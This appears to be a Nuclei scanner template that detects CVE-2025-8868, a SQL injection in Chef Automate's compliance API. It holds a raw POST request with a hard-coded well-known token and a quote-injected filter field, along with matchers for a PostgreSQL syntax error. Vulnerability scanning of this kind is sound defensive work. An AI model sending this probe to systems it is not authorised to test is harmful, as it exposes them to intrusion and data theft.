id: CVE-2025-8868

info:
  name: Chef Automate < 4.13.295 — SQL Injection
  author: 3th1c_yuk1,xbow
  severity: critical
  description: |
    In Progress Chef Automate, versions earlier than 4.13.295, on Linux x86 platform, an authenticated attacker can gain access to Chef Automate restricted functionality in the compliance service via improperly neutralized inputs used in an SQL command using a well-known token.
  impact: |
    Authenticated attackers with knowledge of a well-known token can execute arbitrary SQL queries through the compliance service, potentially gaining access to restricted functionality and sensitive data.
  remediation: |
    Upgrade to version 4.13.295 or later.
  reference:
    - https://xbow.com/blog/cooking-an-sql-injection-vulnerability-in-chef-automate
    - https://nvd.nist.gov/vuln/detail/CVE-2025-8868
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-8868
    epss-score: 0.23138
    epss-percentile: 0.97476
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="Chef Automate"
  tags: cve,cve2025,chef,automate,sqli,vkev,vuln

http:
  - raw:
      - |
        POST /api/v0/compliance/profiles/search HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        x-data-collector-token: 93a49a4f2482c64126f7b6015e6b0f30284287ee4054ff8807fb63d9cbd1c506

        {"filters": [{"type": "name'", "values": ["test"]}]}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 500"
          - "contains(body, 'pq: syntax error')"
          - "contains(content_type, 'application/json')"
        condition: and
# digest: 4a0a0047304502201783b083baece489a872f6b94fa3a7667c00948b65ffae4532b1e5c4ebdc730102210089255003b47d32c5e6f1e08eb5610db524871eb228024882028ab6ef92c2200d:922c64590222798bb761d5b6d8e72950